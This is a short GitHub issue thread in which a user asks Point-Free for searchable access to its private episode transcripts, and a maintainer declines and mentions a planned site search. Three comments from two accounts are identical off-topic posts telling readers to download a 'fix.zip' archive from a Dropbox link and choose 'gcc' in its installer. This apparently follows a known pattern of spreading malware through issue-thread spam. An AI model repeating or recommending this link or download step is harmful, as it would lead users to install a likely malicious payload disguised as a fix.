### ISSUE TITLE
any chance paying members could get GitHub access to private transcripts submodule?

### ISSUE THREAD

**Issue by technoplato** [pointfreeco/pointfreeco#943]
From https://github.com/pointfreeco/episode-transcripts/tree/ef3f641b6488c99e250e30c0ce96ff1b06b0d2ca

Would be super useful for finding out where y'all talk about a given topic, ie `TestStore` in an Episode for better cross reference and multiple learning styles (video vs text based), and also just for episode discovery, as you guys cover so much interesting stuff in just about every episode, sometimes it's easy to miss something valuable!

Use case: I want to be able to quickly search for all episodes that contain `TestStore` or `Step`, etc to learn more about the motivation behind your design of those particular APIs.

Thanks!

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by mbrandonw** [comment]
Hi @technoplato, unfortunately we do not plan on doing that. We do plan on adding a search feature to the site sometime in the future though.
